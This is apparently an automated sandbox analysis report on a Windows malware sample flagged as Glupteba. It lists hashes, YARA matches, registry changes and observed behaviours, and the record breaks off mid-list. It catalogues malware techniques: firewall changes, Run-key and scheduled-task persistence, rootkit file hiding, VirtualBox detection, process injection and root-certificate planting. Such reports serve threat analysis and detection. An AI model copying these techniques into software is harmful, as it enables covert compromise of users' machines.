Analysis
-
max time kernel
141s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
13-06-2024 22:32
Static task
static1
Behavioral task
behavioral1
Sample
a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe
Resource
win7-20240220-en
General
-
Target
a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe
-
Size
3.9MB
-
MD5
a6e6a5298c97037f5f84d5137ce67f50
-
SHA1
cbe82b83c5970186d6d3d3fb898bbe3988c96c99
-
SHA256
debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b
-
SHA512
02bb695f2de853223762c26465cb9963671bcf7ef06145ad5da0809de44f61906282965adbcafd85dfb83cb38712c35bf218f0e042ebf91ff8cf24d4f26799b6
-
SSDEEP
98304:qzxHzV+ef6ktiQfRCon8+yJQf0AingqFjvh2yVBoEjMHIN:O9JXti2RConHkhpj5rBjMHI
Malware Config
Signatures
-
Glupteba payload 37 IoCs
resource yara_rule behavioral2/memory/4520-2-0x00000000015D0000-0x0000000001CC5000-memory.dmp family_glupteba behavioral2/memory/1384-5-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1384-8-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1384-9-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1384-6-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1384-7-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1384-10-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1384-3-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/1384-12-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4628-22-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4628-23-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4628-21-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4628-26-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4628-25-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4628-38-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-45-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-44-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-43-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-46-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-47-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-48-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-49-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-50-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-53-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-55-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-56-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-57-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-58-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-59-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-60-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-61-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-62-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-63-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-64-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-65-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-66-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba behavioral2/memory/4784-67-0x0000000000400000-0x0000000000B0F000-memory.dmp family_glupteba -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2496 netsh.exe 5020 netsh.exe -
Executes dropped EXE 3 IoCs
pid Process 1860 csrss.exe 4784 csrss.exe 1216 patch.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DryFog = "\"C:\\Windows\\rss\\csrss.exe\"" a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Modifies boot configuration data using bcdedit 1 IoCs
pid Process 3040 bcdedit.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4520 set thread context of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 1196 set thread context of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 1860 set thread context of 4784 1860 csrss.exe 98 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\rss a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe File created C:\Windows\rss\csrss.exe a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2656 schtasks.exe 3592 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs csrss.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 csrss.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1384 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 1384 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 4628 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 4628 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 4784 csrss.exe 4784 csrss.exe 4784 csrss.exe 4784 csrss.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1384 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe Token: SeImpersonatePrivilege 1384 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe Token: SeSystemEnvironmentPrivilege 4784 csrss.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 4520 wrote to memory of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 4520 wrote to memory of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 4520 wrote to memory of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 4520 wrote to memory of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 4520 wrote to memory of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 4520 wrote to memory of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 4520 wrote to memory of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 4520 wrote to memory of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 4520 wrote to memory of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 4520 wrote to memory of 1384 4520 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 85 PID 1196 wrote to memory of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 1196 wrote to memory of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 1196 wrote to memory of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 1196 wrote to memory of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 1196 wrote to memory of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 1196 wrote to memory of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 1196 wrote to memory of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 1196 wrote to memory of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 1196 wrote to memory of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 1196 wrote to memory of 4628 1196 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 90 PID 4628 wrote to memory of 4800 4628 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 91 PID 4628 wrote to memory of 4800 4628 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 91 PID 4800 wrote to memory of 2496 4800 cmd.exe 93 PID 4800 wrote to memory of 2496 4800 cmd.exe 93 PID 4628 wrote to memory of 3448 4628 a6e6a5298c97037f5f84d5137ce67f50_JaffaCakes118.exe 94 PID 4628 wrote to memory of 3448 4628 